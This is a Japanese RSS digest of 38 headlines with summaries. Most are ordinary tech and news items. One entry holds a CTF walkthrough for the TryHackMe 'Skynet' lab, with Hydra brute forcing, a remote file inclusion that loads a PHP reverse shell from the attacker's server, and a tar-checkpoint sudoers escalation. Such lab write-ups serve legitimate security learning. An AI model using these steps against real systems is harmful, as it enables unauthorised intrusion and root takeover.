投稿時間:2022-06-08 17:34:35 RSSフィード2022-06-08 17:00 分まとめ(38件)

カテゴリー等	サイト名等	記事タイトル・トレンドワード等	リンクURL	頻出ワード・要約等/検索ボリューム	登録日
IT	気になる、記になる…	Anker、スタンド型8-in-1 USB-Cハブ｢Anker 551 USB-C ハブ (8-in-1, Tablet Stand)｣を発売	https://taisy0.com/2022/06/08/157931.html	intablets	2022-06-08 07:45:01
IT	＠IT Security&Trustフォーラム 最新記事一覧	「GitHub Enterprise」のユーザー管理機能が強化、外部者の招待をより厳密に	https://atmarkit.itmedia.co.jp/ait/articles/2206/08/news137.html	enterprise	2022-06-08 16:30:00
フリーソフト	新着ソフトレビュー - Vector	字幕・テロップ・ナレーションもお任せ。オールインワン動画編集ソフト「BeeCut 動画編集」	https://www.vector.co.jp/magazine/softnews/220608/n2206081.html?ref=rss	beecut	2022-06-08 17:00:00
IT	＠IT 全フォーラム 最新記事一覧	「GitHub Enterprise」のユーザー管理機能が強化、外部者の招待をより厳密に	https://atmarkit.itmedia.co.jp/ait/articles/2206/08/news137.html	enterprise	2022-06-08 16:30:00
IT	ITmedia 総合記事一覧	[ITmedia ビジネスオンライン] みずほ銀行、企業や自治体に決済インフラ提供　J-Coin Pay基盤活用	https://www.itmedia.co.jp/business/articles/2206/08/news155.html	itmedia	2022-06-08 16:47:00
Google	Google Japan Blog	Google Pixel 最新機能のご紹介	http://japan.googleblog.com/feeds/499184013261155868/comments/default	nbspより多くのGooglePixelユーザーに役立つ機能をリアルトーンフィルターが、Googleフォトで利用できるようになりました。	2022-06-08 16:48:00
python	Pythonタグが付けられた新着投稿 - Qiita	Azure Machine Learning CLI v2 でハイパーパラメーターチューニングジョブを投げてみる	https://qiita.com/ShuntaIto/items/19587eb40e5509d1e26b	azure	2022-06-08 16:57:49
python	Pythonタグが付けられた新着投稿 - Qiita	kintone REST APIから取得したJSONデータをCSV化してみる。	https://qiita.com/kitamon/items/b2ff20ae0ffa06ac3155	kintonerest	2022-06-08 16:32:27
python	Pythonタグが付けられた新着投稿 - Qiita	Error: java.lang.RuntimeException: PipeMapRed.waitOutputThreads() の解決法	https://qiita.com/Yuta_Nakamura_/items/fbe2b44ca62598cd61d5	oshadoop	2022-06-08 16:31:02
js	JavaScriptタグが付けられた新着投稿 - Qiita	【React】RechartsのResponsiveContainerでウィンドウを小さくするときだけwidthが再計算されない問題について	https://qiita.com/Naughty1029/items/edd212c56f0090bd8d04	react	2022-06-08 16:57:10
AWS	AWSタグが付けられた新着投稿 - Qiita	AWS 初回ログインでrootへスイッチする方法	https://qiita.com/wolt/items/b6b15e5019f920be09aa	passwdroot	2022-06-08 16:02:17
golang	Goタグが付けられた新着投稿 - Qiita	go getがつかえない。（oapi-codegenのインストール）	https://qiita.com/ajitama/items/1c6f7de16028de14aba3	gogetgit	2022-06-08 16:03:51
海外TECH	DEV Community	Skynet: The Ultimate Terminator CTF Guide 🤖	https://dev.to/christinecdev/skynet-the-ultimate-terminator-ctf-guide-55dm	Skynet The Ultimate Terminator CTF Guide Terminator I don t even know her Enter s laugh track here No but seriously the Skynet Try Hack Me CTF was so much fun and it was challenging and so I had to write a write up on it When you re ready put up your imaginary Terminator posters and let s get back to it Just a quick note before we start If you run the IP address of your given machine in the browser you are met with a search engine that does not work I just wanted to get it out of the way before we start because this page is useless and I don t want to leave you wondering What is Miles password for his emails Before we get crackalacking at Miles emails we need to do some basic enumeration Let s start with an nmap scan to see what services are running on our open ports Let s take note of our Samba smbd workgroup that is running as this means we can exploit it via smbclient nmap sV Pn lt your machine IP gt Let s go ahead and scan for workgroup shares using smbclient smbclient L lt your machine IP gt We can identify two important shares milesdyson and anonymous When we try to log in with milesdyson without a password username we get an access denies status yet we can log in to anonymous this way smbclient anonymous U When we read the attention txt file from anonymous s share we can see that all users had to change their passwords When we read the logs we can see that it contains all the changed passwords Only log txt contains any data Log and have no data Copy the data from logs txt into a txt file on your Desktop or download it from smb and copy it Then create a file named users txt in the same directory as your log txt and insert one value into it Miles Now we can use Hydra to brute force Miles s password export ip lt your machine IP gt hydra L users txt P log txt ip smb V f Tada We have our password What is the hidden directory Okay before we continue let s run a gobuster scan to see which directories we can navigate to gobuster dir w usr share wordlists dirbuster directory list small txt u lt your machine IP gt t From there on we can navigate to administrator in our browser We are met with a SquirrelMain Login page Let s see if we can log in with the credentials username milesdyson password cyborghaloterminator Success If we read the seranakogan skynet emails we realize it s useless binary code The important email is from skynet skynet as it contains Miles smbclient password Let s head back to our terminal and try to log in this time with milesdyson s username and the password from the email above smbclient lt your machine IP gt milesdyson U milesdyson We now have access to his smb We are hacker masters Let s see what is in his notes directory When we read the contents of the important txt file we get our hidden directory What is the vulnerability called when you can include a remote file for malicious purposes Remote file inclusion RFI is an attack targeting vulnerabilities in web applications that dynamically reference external scripts The perpetrator s goal is to exploit the referencing function in an application to upload malware e g backdoor shells from a remote URL located within a different domain What is the user flag Okay now the hard work starts First things first let s see what is in our krazxsvyd hidden directory It s just a personal page Maybe gobuster can tell us more gobuster dir w usr share wordlists dirbuster directory list small txt u http lt your machine IP gt krazxsvyd t Let s now go to our krazxsvyd administrator directory We are met with a Cuppa CMS page which cannot be cracked with sqli attacks such as admin OR With some digging we can see that the Cuppa CMS system is subject to remote file inclusion attacks which means that we can upload a reverse shell to gain access to user data Okay let s get our reverse shell going To make it easy for you you can just open up your terminal and run the following command to pull one from Pentestmonkey s GitHub wget With our reverse shell downloaded we need to change two values our IP address and our port I keep my port at the default because I don t care Change the IP address in your php reverse shell php script to the IP address of your OPENVPN attacker machine IP not your lab s target machine I did this via vim but you can do it manually by naviagting to it if you want vim php reverse shell phpNext up start up a netcat listener on the port defined above in my case sudo nc nlvp Then start up a python server which will serve our reverse shell sudo python m http serverNow go back to your browser and enter the following URL replacing the IP s with your values http lt machine IP gt krazxsvyd administrator alerts alertConfigField php urlConfig http lt OPENVPN IP gt php reverse shell phpNotice the changes on your python server And your netcat listener Our reverse shell worked We now have access Now we can just navigate to user txt and read our user flag What is the root flag We still only have www data access We need to find a way to get root access Let s navigate to home milesdyson backups and see what we can find This backup file gets a shell navigates to the var www html directory and creates a backup of everything in the directory Read more on how we can exploit this on GTFOBins but for now I m just going to show you Side note We can also find the same information as above by running the cat etc crontab command To exploit our tar do the following cd var www htmlecho echo www data ALL root NOPASSWD ALL gt gt etc sudoers gt sudo shtouch var www html checkpoint action exec sh sudo shtouch var www html checkpoint sudo suWe now have root access We can simply now cd into root and get our flag ConclusionCongratulations You have successfully completed the Skynet CTF I hope this was easy enough to follow and that you had fun along the way Until next time happy hacking Visit my GitHub for more	2022-06-08 07:33:19
海外TECH	DEV Community	Boost NextJS TTI & FID performance without compromise and pain	https://dev.to/thanhlm/boost-nextjs-tti-fid-performance-without-compromise-and-pain-5h0n	Boost NextJS TTI amp FID performance without compromise and pain Why should you read this blog As the title said “Boost NextJS TTI amp FID performance without compromise and pain Islands Architectures for Nextjs Result BeforeLive check PageSpeed AfterLive check PageSpeed Hydrating is PURE OVERHEADHydration is Pure OverheadAs described in the post above Hydration progress is PURE OVERHEAD since you need to load the code and render the component twice Imagine you have a very long landing page built by Nextjs and most of it is a static component then when you hit the Enter in the URL HTML contains all your landing page content sent to the browser Which is the result of SSR JavaScript is downloaded to the browser get parsed and executed Most of it contains text content only which is nearly the same as your HTML Which Javascript downloaded now it attaches events to the DOM Now your website is fully usableThe second moves make most of SSR page has TTI Time To Interactive and FID First Input Delay so high Progressive HydrationLet s take a step to optimize our long landing page Because on our landing page most of the component is static Only text and image nothing much called “interactive so it s a waste of time to hydrate those components What if we disable hydrate for some components or only hydrate components when it s in the ViewportThis can easily archive using react hydration on demandimport withHydrationOnDemand from react hydration on demand import Card from Card Hydrate when the component enters the viewportconst CardWithHydrationOnDemand withHydrationOnDemand on visible Card export default class App extends React Component render return lt CardWithHydrationOnDemand title my card wrapperProps className customClassName style display contents gt Now you can optimize the rd bullet Reduce the time JavaScript executed to hydrate our landing page Good job Lazy load component code and hydrate when neededWe can save some executed time using react hydration on demand but we still have lots of redundancy code here JavaScript of those components is still downloaded and parsed it just doesn t get executed Do we have any way to fully render the HTML of the website but only load the component s JS only when needed There is an answer for that The idea is quite simple Fully render HTML in SSRLoad a really minimum of JavaScript to listen to the eventsIf an event is fired load the JS related to it and executedThis solution comes with a huge performance boost by scarifying a little time between every user s interactive But I do think it worse doing so img alt Disable Javascript reduces the TTI more than times What if we can remove half of it lt br gt height src dev to uploads s amazonaws com uploads articles edpbsjuxhrnokflt png width Disable Javascript reduces the TTI more than times What if we can remove half of it This is nice The solution is simple but quite hard to do Why Because Reactjs only supports hydrating a full application It will be solved when v is fully implemented The react hydration on demand actually do some trick to skip the hydrating processIn Nextjs if the component is defined as dynamic and it renders in SSR its JS also gets sent to the browser right away so nothing called lazy hereRead moreWhy Progressive Hydration is Harder than You ThinkSo I make a package that canSkip the component hydrating process Heavily based on react hydration on demandRemove the JS from the bundle and make you control when the JS is loadedHow can I do this trick Check it outHere is the result How to use itInstallnpm install next lazy hydrateyarn add next lazy hydrateUsageimport lazyHydrate from next lazy hydrate Static componentconst WhyUs lazyHydrate gt import components whyus Lazy hydrate when users hover the componentconst Footer lazyHydrate gt import components footer on hover const HomePage gt return lt div gt lt AboveTheFoldComponent gt The Fold lt WhyUs gt lt Footer gt lt div gt DocumentThe API is quite simple I d love to see how this package can help you Boost NextJS TTI amp FID performance without compromise and painOriginal post	2022-06-08 07:22:52
海外TECH	DEV Community	Parallax In Next.js using React-Scroll-Parallax 😉	https://dev.to/nyctonio/parallax-in-nextjs-using-react-scroll-parallax-2110	Parallax In Next js using React Scroll Parallax Parallax a very looking effect which can be achieved by changing the speed of the layers in the background Today lets explore how we can make a similar parallax effect in nextjs using a package called react scroll parallax npm i react scroll parallaxlets initialize our project using create next appnpx create next app example with tailwindcss parallaxI made a complete tutorial on youtube you can also check it out now lets continue our blogFirst of all replace all typescript file to JavaScript as the starter template comes configured with typescript or you can also write normal JavaScript inside the typescript file not a big dealSo first wrap our Component in app js with ParallaxProvider and as we are creating our parallax in horizontal scrolling so we have to mention the scrollAxis horizontal import styles globals css import ParallaxProvider from react scroll parallax function MyApp Component pageProps return lt ParallaxProvider scrollAxis horizontal gt lt Component pageProps gt lt ParallaxProvider gt export default MyAppthe final effect that we want is something like this So as there is our main scene and there are some different components like train cloud and sun and we want to move the cloud and train with relative to our background image and we want to make sun to be static so we will use useRef and useParallax from react scroll parallax to achieve this we will create a const target which will store the outermost div and and then we will use useParallax to create the refs for the inner divs and pass speed and targetElement in the useParallax here is the code import useParallax from react scroll parallax import React useRef from react import Image from next image const index gt const target useRef null const train useParallax speed targetElement target current const cloud useParallax speed targetElement target current return lt div ref target style backgroundImage url Scene png backgroundSize cover backgroundPosition center width px className h screen gt lt div className fixed top left gt lt Image src Sun png height width gt lt div gt lt div ref train ref className absolute style top vh left vw gt lt Image src Train png height width gt lt div gt lt div ref cloud ref className absolute top gt lt Image src Cloud png height width gt lt div gt lt div gt export default index complete code in github gt Hurrayyyyy you have created a parallax effect I would recommend you to check out some of these resources for more knowledge Connect me on Twitter Twitter Do check out my Github for amazing projects Github Connect me on LinkedIn Linkedin Read my another article Authentication in nodejs with mongodb bcrypt and jwt web tokensAll React Hooks in A single Post	2022-06-08 07:16:22
医療系	医療介護 CBnews	介護の書式統一化、人員配置基準緩和へ-規制改革実施計画に明記	https://www.cbnews.jp/news/entry/20220608161437	人員配置	2022-06-08 17:00:00
金融	ニッセイ基礎研究所	分配重視が薄れた骨太の方針～勝負は参院選後「黄金の３年」	https://www.nli-research.co.jp/topics_detail1/id=71363?site=nli	ネガティブ評価になるとすれば、市場が「黄金の年」になっても何も決められない、変わらないと岸田政権を評価しはじめた時だろう。	2022-06-08 16:31:28
金融	日本銀行：RSS	「決済の未来フォーラム デジタル通貨分科会：中央銀行デジタル通貨を支える技術（第4回会合）」（6月2日）の議事の概要	http://www.boj.or.jp/announcements/release_2022/rel220608a.htm	中央銀行	2022-06-08 17:00:00
海外ニュース	Japan Times latest articles	Suspected ringleader of COVID aid fraud in Japan arrested in Indonesia	https://www.japantimes.co.jp/news/2022/06/08/national/crime-legal/suspected-ringleader-subsidies-fraud-indonesia/	Suspected ringleader of COVID aid fraud in Japan arrested in IndonesiaWorking with his wife and son the Japanese man is suspected of obtaining more than million in government subsidies intended as pandemic relief	2022-06-08 16:42:14
海外ニュース	Japan Times latest articles	Seoul pins hope on U.S. strategic assets to deter Pyongyang	https://www.japantimes.co.jp/news/2022/06/08/asia-pacific/south-korea-nuclear-deterrence/	Seoul pins hope on U S strategic assets to deter PyongyangAs North Korea continues to enhance its missile arsenal South Korea s new conservative administration wants to tighten the screws on Pyongyang	2022-06-08 16:16:56
海外ニュース	Japan Times latest articles	Following Ukraine crisis, Kishida bids to reform U.N. Security Council	https://www.japantimes.co.jp/news/2022/06/08/national/kishida-un-security-council-reform/	Following Ukraine crisis Kishida bids to reform U N Security CouncilAs Russia has stopped the body taking action over the conflict Kishida specifically hopes to limit the five permanent members exercise of veto power	2022-06-08 16:13:33
海外ニュース	Japan Times latest articles	Japan lodges protest against Russia for suspending safe fishing pact	https://www.japantimes.co.jp/news/2022/06/08/national/russia-japan-northern-territories-fishing-agreement/	sakhalin	2022-06-08 16:06:41
海外ニュース	Japan Times latest articles	The return of degeiko training may herald more competitive Sumo	https://www.japantimes.co.jp/sports/2022/06/08/general/degeiko-training-back-in-sumo/	covid	2022-06-08 16:02:02
ニュース	BBC News - Home	PM under pressure to cut taxes after confidence vote	https://www.bbc.co.uk/news/uk-politics-61726091?at_medium=RSS&at_campaign=KARANGA	confidence	2022-06-08 07:45:30
ニュース	BBC News - Home	Cineworld cancels The Lady of Heaven film screenings after protests	https://www.bbc.co.uk/news/business-61729392?at_medium=RSS&at_campaign=KARANGA	muslim	2022-06-08 07:41:15
ニュース	BBC News - Home	Derby County: Chris Kirchner's takeover of financially-stricken club expected to collapse	https://www.bbc.co.uk/sport/football/61729900?at_medium=RSS&at_campaign=KARANGA	Derby County Chris Kirchner x s takeover of financially stricken club expected to collapseChris Kirchner s attempt to buy financially stricken club Derby County is expected to collapse reports BBC Radio Derby	2022-06-08 07:48:11
北海道	北海道新聞	リーチ「若手に負けない」　ラグビー日本が合宿公開	https://www.hokkaido-np.co.jp/article/691044/	若手	2022-06-08 16:32:00
北海道	北海道新聞	ＪＲ北海道、大雪対策に３１億円　除雪車両更新など　業務改善策最終報告	https://www.hokkaido-np.co.jp/article/691037/	業務改善	2022-06-08 16:31:40
北海道	北海道新聞	ロシア演奏家外して開催へ、秋田　１０月の「日露交歓コンサート」	https://www.hokkaido-np.co.jp/article/691043/	開催	2022-06-08 16:29:00
北海道	北海道新聞	米、核実験被ばく者の補償延長　改正法、期限切れ回避	https://www.hokkaido-np.co.jp/article/691042/	期限切れ	2022-06-08 16:27:00
北海道	北海道新聞	食品各社、値上げでも減益　想定以上に原材料高騰	https://www.hokkaido-np.co.jp/article/691040/	食品メーカー	2022-06-08 16:23:00
北海道	北海道新聞	東証続伸、２万８千円回復　円安進行で買い優勢	https://www.hokkaido-np.co.jp/article/691014/	円安進行	2022-06-08 16:01:39
北海道	北海道新聞	中国「オーカスは重大リスク」　核不拡散会議前に米けん制	https://www.hokkaido-np.co.jp/article/691036/	朝鮮半島	2022-06-08 16:09:00
IT	週刊アスキー	祝・タンバリン実装！『DQウォーク』の公式動画スマートウォーク#46が公開	https://weekly.ascii.jp/elem/000/004/094/4094117/	youtube	2022-06-08 16:50:00
マーケティング	AdverTimes	ファンケル、海外マーケティング部部長ほか（22年7月1日付）	https://www.advertimes.com/20220608/article386465/	海外事業	2022-06-08 07:59:25
マーケティング	AdverTimes	相葉雅紀「ゴルフなんて、最高だ。」キャロウェイゴルフが東名阪でOOH展開	https://www.advertimes.com/20220608/article386425/	callawayforall	2022-06-08 07:10:13
海外TECH	reddit	A woman missing in Tokyo. Need help.	https://www.reddit.com/r/japanlife/comments/v7jaoq/a_woman_missing_in_tokyo_need_help/	A woman missing in Tokyo Need help Hey there I ve just heard that a friend of a friend has been missing for about days now Her friends have contacted her workplace and she hasn t been to work and no one has seen her A friend in Tokyo has gone to her apartment and knocked for a long time with no response Apparently the woman has a boyfriend who is Japanese and they haven t been able to contact the boyfriend either I m not sure if this is because the boyfriend is also missing or they just don t know how to get hold of him At this point they ve already contacted the police The woman is usually very active on her social media but hasn t been online at all for the past few days I m not sure if this info makes any difference but she is a foreigner but of Asian descent and looks very much Japanese Is there anything else that we can do to help find her Any other subreddits I can post to or organization I could contact submitted by u thisisalmostooreal to r japanlife link comments	2022-06-08 07:01:19
海外TECH	reddit	What's the most Japanese compliment you've gotten?	https://www.reddit.com/r/japanlife/comments/v7jmxc/whats_the_most_japanese_compliment_youve_gotten/	What x s the most Japanese compliment you x ve gotten An opposite of the Japanese complaint thread what s the most Japanese compliment you ve gotten A compliment that no one in your home country would give you submitted by u razorbeamz to r japanlife link comments	2022-06-08 07:23:12